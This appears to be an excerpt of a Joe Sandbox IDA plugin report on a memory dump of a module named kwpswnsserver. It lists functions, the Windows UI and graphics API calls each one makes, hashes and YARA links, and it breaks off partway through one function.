                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$Window$CaptureKillLoadParentRectReleaseTimerUpdate
                                                                  • String ID:
                                                                  • API String ID: 2135910768-0
                                                                  • Opcode ID: cc77db888525b3ab3c823514908cd09e1dd567ee39600a4715cf077c1739b296
                                                                  • Instruction ID: 641975349bded1ee80159adb8596a915d2b9af9822abc499dc6d28ef6a13600f
                                                                  • Opcode Fuzzy Hash: cc77db888525b3ab3c823514908cd09e1dd567ee39600a4715cf077c1739b296
                                                                  • Instruction Fuzzy Hash: 4371C931B0421A9FDF389FA9CA98BAEB775FB45704F154925E809E3A40D7387D028B54
                                                                  Function 6C932721 Relevance: 15.2, APIs: 10, Instructions: 211windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C88B7C8: __EH_prolog3_catch.LIBCMT ref: 6C88B7CF
                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 6C932784
                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 6C9327B9
                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 6C9327E4
                                                                  • LoadIconW.USER32(?,00000000), ref: 6C932819
                                                                  • LoadIconW.USER32(00000000,00007F00), ref: 6C93282C
                                                                  • GetClassLongW.USER32(?,000000F2), ref: 6C93285B
                                                                  • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 6C9328E4
                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 6C9328A6
                                                                    • Part of subcall function 6C8D14CE: __EH_prolog3_catch.LIBCMT ref: 6C8D14D8
                                                                    • Part of subcall function 6C8D14CE: CloseHandle.KERNEL32(00000000,?,00000000,00000080,6C932FD1,?,00000000,?,?,00000000), ref: 6C8D1513
                                                                    • Part of subcall function 6C8D14CE: GetTempPathW.KERNEL32(00000104,00000000,00000104,?,00000000,00000080,6C932FD1,?,00000000,?,?,00000000), ref: 6C8D1534
                                                                    • Part of subcall function 6C8D14CE: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,04000100,00000000,000000FF,?,00000104,000000FF,?,?,00000000), ref: 6C8D1589
                                                                  • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C93299B
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C9329B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$H_prolog3_catchIconLoad$ClassCloseCreateFileHandleLongPathTemp
                                                                  • String ID:
                                                                  • API String ID: 2083023585-0
                                                                  • Opcode ID: 9b5ad83063620bb9a2de191073dc415ad248d0e4420000375ab6578747b2de22
                                                                  • Instruction ID: 1860b7212ff23396de14b9532e9d7bde50308b294e562d5e117be2ea802bbd3c
                                                                  • Opcode Fuzzy Hash: 9b5ad83063620bb9a2de191073dc415ad248d0e4420000375ab6578747b2de22
                                                                  • Instruction Fuzzy Hash: 2F71CE30301620AFDF299F24CD98BAA3B66BF45755F14017AFD19AB791DB30A801CFA0
                                                                  Function 6C904B54 Relevance: 15.2, APIs: 10, Instructions: 200COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C904B5E
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 6C904B83
                                                                  • GetObjectW.GDI32(?,00000054,?), ref: 6C904BC8
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C904CB4
                                                                  • SelectObject.GDI32(?,?), ref: 6C904CD6
                                                                  • GetPixel.GDI32(?,00000000,00000000), ref: 6C904D35
                                                                  • GetPixel.GDI32(?,?,00000000), ref: 6C904D47
                                                                  • SetPixel.GDI32(?,00000000,00000000,00000000), ref: 6C904D56
                                                                  • SetPixel.GDI32(?,?,00000000,00000000), ref: 6C904D68
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C904DB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectPixel$Select$CompatibleCreateH_prolog3_
                                                                  • String ID:
                                                                  • API String ID: 1266819874-0
                                                                  • Opcode ID: 06c167f8b9f057d3c127433ca14a0781e90a55e1fbf9a798f83f2d10a3633de5
                                                                  • Instruction ID: bb075964f590c1d9b36442b7b5af581fa631a02c6007bdce1e8d91d81ffd44d6
                                                                  • Opcode Fuzzy Hash: 06c167f8b9f057d3c127433ca14a0781e90a55e1fbf9a798f83f2d10a3633de5
                                                                  • Instruction Fuzzy Hash: 7A811471E002299BDB249FA9CD84A9DBBB9FF59304F2481ADE858E7701DB30AD45CF50
                                                                  Function 6C8BC935 Relevance: 15.2, APIs: 10, Instructions: 163timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 6C8BC958
                                                                  • ScreenToClient.USER32(?,?), ref: 6C8BC965
                                                                  • KillTimer.USER32(?,0000EC17), ref: 6C8BC97D
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BC9AC
                                                                  • KillTimer.USER32(?,0000EC18), ref: 6C8BCA3B
                                                                  • GetParent.USER32(?), ref: 6C8BCA50
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BCA7C
                                                                  • KillTimer.USER32(?,0000EC07), ref: 6C8BCADB
                                                                  • GetClientRect.USER32(?,?), ref: 6C8BCAEF
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BCAFF
                                                                    • Part of subcall function 6C89BE35: ShowWindow.USER32(?,00000000,?,?,6C89961A,00000000), ref: 6C89BE46
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$KillTimer$Client$CursorParentScreenShowWindow
                                                                  • String ID:
                                                                  • API String ID: 966434589-0
                                                                  • Opcode ID: b8185065d665c203c47aa8d525bef0f4e0c066be43810f46a6005ca5a99824c5
                                                                  • Instruction ID: 59613860ada302a435bb166ef570f645c3e82d119ccdda58a1e84e5fc13752eb
                                                                  • Opcode Fuzzy Hash: b8185065d665c203c47aa8d525bef0f4e0c066be43810f46a6005ca5a99824c5
                                                                  • Instruction Fuzzy Hash: 1C517031B0061AAFDF19AF68CD54AAEBB79FF45308F144626E815B3750DB30A852CB90
                                                                  Function 6C8A4CE0 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,00000046,00000000,?,?), ref: 6C8A4CFF
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8A4D1E
                                                                  • SetRect.USER32(?,?,00000000,?,?), ref: 6C8A4D5D
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 6C8A4D6C
                                                                  • SetRect.USER32(?,?,00000000,?,?), ref: 6C8A4D84
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 6C8A4D93
                                                                  • SetRect.USER32(?,00000000,?,?,?), ref: 6C8A4DBB
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 6C8A4DCA
                                                                  • SetRect.USER32(?,00000000,?,00000001,?), ref: 6C8A4DE1
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 6C8A4DF0
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Invalidate$Window$Proc
                                                                  • String ID:
                                                                  • API String ID: 570070710-0
                                                                  • Opcode ID: 243c9a84e7ab4643d38f9c69dbe0284b18a4d67cf5e5ba77823d54f9c80c07cf
                                                                  • Instruction ID: b0178b03efa0dd4176c5e007166e2f54b5f82ab057c59ca8325db2ef4baedbc1
                                                                  • Opcode Fuzzy Hash: 243c9a84e7ab4643d38f9c69dbe0284b18a4d67cf5e5ba77823d54f9c80c07cf
                                                                  • Instruction Fuzzy Hash: A3411B72A0031AAFDB25DFA4CD49FAFBBB8FB49704F104619F605E2550DB70A941CB61
                                                                  Function 6C8A263C Relevance: 15.1, APIs: 10, Instructions: 100timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8A2643
                                                                  • ClientToScreen.USER32(?,?), ref: 6C8A2662
                                                                  • GetSystemMetrics.USER32(00000025), ref: 6C8A266A
                                                                  • GetSystemMetrics.USER32(00000025), ref: 6C8A2680
                                                                  • GetSystemMetrics.USER32(00000024), ref: 6C8A2694
                                                                  • GetSystemMetrics.USER32(00000024), ref: 6C8A26A8
                                                                  • CreateEllipticRgn.GDI32(00000000,00000000,00000020,00000020,?,00007921,?,?,?,?,00000010), ref: 6C8A2721
                                                                  • SetWindowRgn.USER32(?,?,00000001), ref: 6C8A2738
                                                                  • SetCapture.USER32(?,?,00007921,?,?,?,?,00000010), ref: 6C8A2741
                                                                  • SetTimer.USER32(?,0000EC08,00000032,00000000), ref: 6C8A275A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$CaptureClientCreateEllipticH_prolog3ScreenTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 3001615190-0
                                                                  • Opcode ID: 8c37c3d13e1be9a950f1b8e38d9b1a5f6109ee1892cca9acd9c15360cf1d952f
                                                                  • Instruction ID: b3747bfd1b555b666439711cb48603a392d9e8d35f3434719689045baa860c69
                                                                  • Opcode Fuzzy Hash: 8c37c3d13e1be9a950f1b8e38d9b1a5f6109ee1892cca9acd9c15360cf1d952f
                                                                  • Instruction Fuzzy Hash: 40315D71700712AFEB289F78CD59F6ABB74FB09704F104628B659E7680DB71A8118B90
                                                                  Function 6C88A904 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 73libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6C88A92A
                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C88A93A
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C88A943
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C88A951
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 6C88A979
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeDirectoryEncodeHandleModuleProcSystem
                                                                  • String ID: SetDefaultDllDirectories$\$kernel32.dll
                                                                  • API String ID: 2101061299-3881611067
                                                                  • Opcode ID: 5c81a00aca120739b982cbc0cfe03be04e6e9ed20291e527fee791fa9f04072d
                                                                  • Instruction ID: 26d98afb1ac3684fe7fa9f59e3e4100875767c4fab4d930806c0703c59ebfc8b
                                                                  • Opcode Fuzzy Hash: 5c81a00aca120739b982cbc0cfe03be04e6e9ed20291e527fee791fa9f04072d
                                                                  • Instruction Fuzzy Hash: 8F21D431A46629ABCB30DA698E4CBDB37F8AF11708F454865B815E3DC0E724E6848691
                                                                  Function 6C8ACC54 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStockObject.GDI32(00000011), ref: 6C8ACC76
                                                                  • GetStockObject.GDI32(0000000D), ref: 6C8ACC82
                                                                  • GetObjectW.GDI32(00000000,0000005C,?), ref: 6C8ACC93
                                                                  • GetDC.USER32(00000000), ref: 6C8ACCA2
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 6C8ACCB9
                                                                  • MulDiv.KERNEL32(?,00000048,00000000), ref: 6C8ACCC5
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 6C8ACCD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Stock$CapsDeviceRelease
                                                                  • String ID: System
                                                                  • API String ID: 46613423-3470857405
                                                                  • Opcode ID: bd55e6eb09106d4e8ef71132ced178ef170b8eb565f4c3a4c6eef3796aa58f24
                                                                  • Instruction ID: 8196661b69f713b15b2236fab70f151a575bb84d28901d7ba902a00f809ea0b7
                                                                  • Opcode Fuzzy Hash: bd55e6eb09106d4e8ef71132ced178ef170b8eb565f4c3a4c6eef3796aa58f24
                                                                  • Instruction Fuzzy Hash: A5119671700319ABEB28BFA9CD59BAF7BB9FB45B09F104119F50ADB1C1DB609D02CA50
                                                                  Function 6C88EB68 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ActiveFocus$MessageSend
                                                                  • String ID: u
                                                                  • API String ID: 1556911595-4067256894
                                                                  • Opcode ID: 5d5547203757483d2b10198fdeee608a47fa6b81264811eeeed6be225786a14e
                                                                  • Instruction ID: 50d47fce1583e29f434808faf9666981bac6b9d8505fa341093b820ab1549fe2
                                                                  • Opcode Fuzzy Hash: 5d5547203757483d2b10198fdeee608a47fa6b81264811eeeed6be225786a14e
                                                                  • Instruction Fuzzy Hash: 91113436A13725ABEB322E39CF486AE3A7AEF4675CB118E24F915C6C81C734C40187D0
                                                                  Function 6C99C689 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C99C690
                                                                    • Part of subcall function 6C8A3360: EnterCriticalSection.KERNEL32(6CA583D0,?,?,0000007C,?,6C88F718,00000001), ref: 6C8A3391
                                                                    • Part of subcall function 6C8A3360: InitializeCriticalSection.KERNEL32(00000000,?,6C88F718,00000001), ref: 6C8A33A7
                                                                    • Part of subcall function 6C8A3360: LeaveCriticalSection.KERNEL32(6CA583D0,?,6C88F718,00000001), ref: 6C8A33B5
                                                                    • Part of subcall function 6C8A3360: EnterCriticalSection.KERNEL32(00000000,?,0000007C,?,6C88F718,00000001), ref: 6C8A33C2
                                                                  • GetProfileIntW.KERNEL32(windows,DragScrollInset,0000000B), ref: 6C99C6DB
                                                                  • GetProfileIntW.KERNEL32(windows,DragScrollDelay,00000032), ref: 6C99C6EE
                                                                  • GetProfileIntW.KERNEL32(windows,DragScrollInterval,00000032), ref: 6C99C701
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Profile$Enter$H_prolog3InitializeLeave
                                                                  • String ID: DragScrollDelay$DragScrollInset$DragScrollInterval$windows
                                                                  • API String ID: 4229786687-1024936294
                                                                  • Opcode ID: 7978ae84e7a8b3dbea80fb3777cdfb0f1a232c4aa6928999e5766e72f329dbf3
                                                                  • Instruction ID: 09c84753d5836b563d032d7c1e054860efedefe99e2cca507d118f81dea012e2
                                                                  • Opcode Fuzzy Hash: 7978ae84e7a8b3dbea80fb3777cdfb0f1a232c4aa6928999e5766e72f329dbf3
                                                                  • Instruction Fuzzy Hash: D7010CB5644301AEDF34DF789E4574976F4BB09B08F448929B2089BA80C7B6858ACB18
                                                                  Function 6C8CE534 Relevance: 14.0, APIs: 9, Instructions: 464COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8CE53B
                                                                  • FillRect.USER32(?,?,-000000D0), ref: 6C8CE568
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8CE67C
                                                                  • CreatePolygonRgn.GDI32(?,00000008,00000002), ref: 6C8CE8D3
                                                                  • FillRect.USER32(00000002,?,?), ref: 6C8CE957
                                                                  • FillRect.USER32(00000002,?,-000000D0), ref: 6C8CE99A
                                                                  • Polyline.GDI32(00000002,?,00000008), ref: 6C8CE9B2
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8CEA05
                                                                  • FillRect.USER32(00000000,?,-000000D0), ref: 6C8CEA3A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: FillRect$H_prolog3_$CreateH_prolog3PolygonPolyline
                                                                  • String ID:
                                                                  • API String ID: 835743752-0
                                                                  • Opcode ID: 1f02afe251b348e54f2a397ce01edc105c68e8a4b462f41aa4bca9bb77c22039
                                                                  • Instruction ID: d6207d97fb9f8bb12dfb3cf33441d71fd58e707531ce095a7535f20301f9bb19
                                                                  • Opcode Fuzzy Hash: 1f02afe251b348e54f2a397ce01edc105c68e8a4b462f41aa4bca9bb77c22039
                                                                  • Instruction Fuzzy Hash: 21029E71A012199FDF24CFA8CA85BEEB7B5BF08304F104569E815ABB90DB70AD49CF51
                                                                  Function 6C89A1A8 Relevance: 13.6, APIs: 9, Instructions: 104windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C89A1AF
                                                                    • Part of subcall function 6C8C5DC9: LoadCursorW.USER32(?,00007F00), ref: 6C8C5E2B
                                                                  • GetSystemMenu.USER32(?,00000000,00000000,00000000,6CA37FF0,?,6CA509BC), ref: 6C89A220
                                                                  • DeleteMenu.USER32(?,0000F000,00000000,00000000), ref: 6C89A243
                                                                  • DeleteMenu.USER32(?,0000F020,00000000), ref: 6C89A253
                                                                  • DeleteMenu.USER32(?,0000F030,00000000), ref: 6C89A263
                                                                  • DeleteMenu.USER32(?,0000F120,00000000), ref: 6C89A273
                                                                  • DeleteMenu.USER32(00000000,0000F060,00000000,0000F011), ref: 6C89A2A6
                                                                  • AppendMenuW.USER32(00000000,00000000,0000F060,?), ref: 6C89A2BA
                                                                  • SetParent.USER32(?,?), ref: 6C89A307
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Delete$AppendCursorH_prolog3LoadParentSystem
                                                                  • String ID:
                                                                  • API String ID: 2353656248-0
                                                                  • Opcode ID: abb4bf24f74c55279b95d737ab86a59954664a47c2d5ab77156f06cb483f54d8
                                                                  • Instruction ID: a235ae1f0f0a818b59f45acbb838125eb6bbb85d066688e5cf58699917f67424
                                                                  • Opcode Fuzzy Hash: abb4bf24f74c55279b95d737ab86a59954664a47c2d5ab77156f06cb483f54d8
                                                                  • Instruction Fuzzy Hash: C341B331B4071AAFEB349FA4CD59FAE7AB4FF04B48F004924B655A79D0DB70A900DB94
                                                                  Function 6C8AC084 Relevance: 13.6, APIs: 9, Instructions: 77windowkeyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetPropW.USER32(?,?), ref: 6C8AC0A2
                                                                  • GlobalLock.KERNEL32(00000000), ref: 6C8AC0AF
